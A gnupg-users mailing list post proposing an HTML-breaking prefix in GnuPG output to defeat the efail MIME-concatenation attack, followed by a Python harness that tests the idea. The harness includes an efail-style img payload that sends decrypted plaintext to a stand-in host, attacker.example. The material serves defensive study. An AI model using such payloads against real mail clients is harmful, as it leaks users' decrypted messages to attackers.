It struck me at lunch that it might be possible for gnupg itself to scupper the MIME concatenation (direct exfiltration) technique mentioned in efail, and thereby plug the leaks in multiple vulnerable clients at once. This would however require it to be naughty with its output.

MIME concatenation works because in many clients the individual MIME parts of a message are not kept isolated from each other after they are passed to the rendering engine. Instead, they are concatenated together into a single document, perhaps with some separator such as an hline. This is dangerous because an HTML parser will interpret that document as a single unit, breaking all sorts of same-origin hygiene. The primary technique for exfiltration is to wrap the target document in an active HTML tag such as <img href="....">. But HTML requires the quoted string to be safe, and there is no way for the efail attack to perform input sanitation on the target document before the HTML parser gets its hands on it.

Bear with me, because this is *not* a fully thought-out plan, merely an idea. ;-)

So gnupg could (under circumstances likely to prevail inside a mail client) prefix and/or suffix its output with an HTML content-injection string specially designed to break out of whatever active element the efail attack might be using. It could be as simple as prefacing the output document with the perfectly valid HTML tag:

<!-- "></html>" -->

If this were parsed by an HTML display engine in the normal manner, it would have negligible effect. But enclosed in a tag property, the first set of quotes+angle would exit the tag safely, and then the </html> would cause an early end to the document, with luck causing a fatal validation error, or preventing any content that came after it from being accessible via the DOM.

I see a couple of problems with this. Firstly, it may not be possible to tailor a single content-injection tool that would be effective against all attacks and in all HTML engines, although. And secondly, gnupg will probably not be able to tell on its own whether it has been called from an MUA context.

But setting an environment variable such as GNUPG_HTML_COUNTERMEASURES=true would certainly be sufficient, providing both users and MUA developers a convenient big red switch that can just be enabled.

--
Andrew Gallagher
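As an added example (not from Andrew's message and not GnuPG code), the following Python harness models a client that glues the three MIME parts into one HTML document and parses the result with the standard library's html.parser, checking whether the decrypted plaintext lands inside a fetchable src attribute with and without the proposed prefix. The plaintext, the attacker.example host and the src= wrapper are constructed placeholders, and html.parser is just one tolerant parser, so this exercises only the attribute break-out, not how a real rendering engine treats the early </html>.

```python
from html.parser import HTMLParser

# Constructed stand-in for the decrypted body; not real data.
PLAINTEXT = "SECRET: the quarterly numbers"
# The prefix proposed in the message above.
COUNTERMEASURE = '<!-- "></html>" -->'
# Attacker-controlled MIME parts surrounding the encrypted part, with a
# placeholder host (constructed); the img wrapper is the form described above.
INJECT_BEFORE = '<img src="http://attacker.example/collect?d='
INJECT_AFTER = '">'


class UrlAttrCollector(HTMLParser):
    """Record every src/href value the rendered document would try to fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value is not None:
                self.urls.append(value)

    def handle_data(self, data):
        self.text.append(data)


def render_concatenated(parts):
    """Mimic a client that concatenates MIME parts into one HTML document.
    Returns (URLs the client would fetch, visible text)."""
    parser = UrlAttrCollector()
    parser.feed("".join(parts))
    parser.close()
    return parser.urls, "".join(parser.text)


def plaintext_in_fetched_url(countermeasure_enabled):
    """True if the decrypted plaintext ends up inside a URL the client loads."""
    decrypted = (COUNTERMEASURE if countermeasure_enabled else "") + PLAINTEXT
    urls, _ = render_concatenated([INJECT_BEFORE, decrypted, INJECT_AFTER])
    return any(PLAINTEXT in url for url in urls)


if __name__ == "__main__":
    for enabled in (False, True):
        print(f"GNUPG_HTML_COUNTERMEASURES={str(enabled).lower()}: "
              f"plaintext in fetched URL = {plaintext_in_fetched_url(enabled)}")
```

With the prefix, the quote and angle bracket close the src attribute early, so the URL the client would request ends at the comment opener and the plaintext falls through into ordinary page text instead.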
_______________________________________________
Gnupg-users mailing list
Gnupg-users@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users